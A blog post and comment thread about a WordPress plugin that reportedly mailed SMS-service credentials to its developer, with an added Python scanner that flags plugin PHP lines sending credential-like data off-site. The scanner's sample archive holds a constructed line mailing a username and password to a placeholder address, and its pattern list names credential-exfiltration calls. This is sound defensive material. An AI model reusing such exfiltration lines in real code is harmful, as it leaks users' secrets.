Now, how would you react knowing that the plugin you had used for ages emailed your admin login credentials to the plugin developer and you didn’t even know?
Scary – isn’t it? Well, that’s just what happened to the blogger Sven.
Sven reports in his post that while experimenting with a few plugins he found that one plugin (Pushit) actually emailed his admin id and password to an email address.
Now, this could have been an oversight or a mistake, but it’s a seriously scary thought.
Quite honestly, I don’t know of anything that will give us 100% security, but there are certain things you can do for sure.
1. Install and run plugins only from developers who have a good reputation.
2. Always test the plugin on a demo/test blog.
3. Look for plugin reviews in the comments on the plugin page (usually the developer’s blog), or elsewhere on the web.
4. Never install plugins not tested with your version of blog software.
WordPress plugins are great resources and probably one of the main reasons we, like millions of others, love the software. But blindly trusting all of them could land us in trouble; just a word of caution to all.
Thank you very much for sharing such valuable information. Really, this post creates awareness for all WordPress developers.
Reply
Is it impossible to see the code of WordPress plugins then?
Reply
Tech @ InkAPoint
Replied:
Yes. You can. Just open the plugin’s zip file and see the php files.
Reply
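The reply above suggests opening the plugin’s zip file and reading its PHP files, and the post describes a plugin that mailed credentials off-site. Below is an added example (not from the post, the comments, or any real plugin) of a small static check a site owner can run over a plugin archive before installing it: it flags PHP lines that both call an outbound function (mail, HTTP request) and mention something that looks like a credential. The function list and the name pattern are assumptions for illustration, and the archive it scans is constructed inline.

```python
import io
import re
import zipfile

# PHP/WordPress functions through which a plugin can send data off-site.
# Assumed list for this example; extend it for your own review.
OUTBOUND_CALLS = ("mail(", "wp_mail(", "wp_remote_post(", "wp_remote_get(",
                  "curl_exec(", "file_get_contents(")
# Names that suggest a credential is being handled on the same line.
CREDENTIAL_HINT = re.compile(r"pass(word|wd)?|user(name)?|login|secret|key", re.I)

def scan_plugin_zip(zip_bytes):
    """Return (member, line_no, line) for every .php line in the archive that
    calls an outbound function and also mentions a credential-looking name."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".php"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                if any(c in line for c in OUTBOUND_CALLS) and CREDENTIAL_HINT.search(line):
                    findings.append((name, no, line.strip()))
    return findings

def build_sample_zip():
    """Constructed sample archive for the demo; not a real plugin."""
    suspicious = (
        "<?php\n"
        "$u = get_option('sms_user'); $p = get_option('sms_pass');\n"
        "wp_mail('dev@example.invalid', 'debug', \"user=$u pass=$p\");\n"
    )
    # Legitimate use of wp_mail: notifies the admin, sends no credentials.
    clean = "<?php\nwp_mail(get_option('admin_email'), 'Hello', 'Post published');\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("sample-plugin/sample-plugin.php", suspicious)
        zf.writestr("sample-plugin/notify.php", clean)
    return buf.getvalue()

if __name__ == "__main__":
    for member, no, line in scan_plugin_zip(build_sample_zip()):
        print(f"{member}:{no}: {line}")
```

A hit only means the line deserves a manual read; the clean notify.php shows that an outbound call by itself is not flagged.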
I have to disagree with #4 completely.
I’ve installed WordPress 2.8 (not on my main site, I admit) and since a lot of plugin creators seem to have ignored the release of 2.8, I’ve had to test myself whether the plugins will work.
DailySEOBlog seems to have ignored #4 itself.
I can’t say positively, but I’m pretty sure that the “Notify me of follow-up comments via e-mail” is the Subscribe to Comments plugin. If you look at the Subscribe to Comments page (wordpress.org/extend/plugins/subscribe-to-comments) you will notice that it is listed as officially only “Compatible up to: 2.3.1”. That hasn’t stopped the thousands of people who download it weekly.
Reply
Mani Karthik
Replied:
I completely agree Yael. In fact, I hadn’t taken it seriously to this time. If the plugin works fine even after an upgrade, then I’d keep it. But I think this is a mistake I’ve been making and am seriously considering pulling them off with minimum user exp problems.
Reply
Tech @ InkAPoint
Replied:
You are right, Mani. Sometimes plugins will work like upward-compatible versions. But the problem is that not all plugins work as 100% compatible with newer versions of WP.
We can’t say that plugins will not work if they were developed for earlier versions of WP.
Reply
I would have thought that WordPress’s approval process would be a little more careful about the kind of code placed in these plugins, but I guess not.
Reply
Thanks Mani for the advice.
Reply
I think one should always use a plugin which is there in the WordPress directory.
Don’t use plugins from the author’s site.
What do you think?
Reply
@Nihar: until Sven’s post, that particular plugin was in the WordPress directory.
However, I think the title of this post is (unintentionally) misleading. If you read Sven’s post again, you’ll see that the plugin did not do anything with the WordPress admin password, only some basic SMS request data (that included the username and password for the SMS service, but nothing as sensitive as the WordPress admin password).
Don’t get me wrong; it’s still a security issue. After all, the plugin was doing something without the user’s permission.
But I’m pretty sure that your admin password is actually very safe, even from malicious plugin authors, because it is not stored clear text (even in the database). There’s no way that I know of for a plugin to ever access the unencrypted version of the password.
All that said, it is definitely best to be cautious with any plugins. I think your tips are good ones. Perhaps some enterprising security pro will start a plugin-review blog and do us all a favor.
Reply
Malicious WordPress plugin steals your admin password, and you didn’t even know? http://tinyurl.com/machfl
Reply
It’s best, but also it’s a naughty tool.
Reply
Great one, and well done. Keep it up.
Reply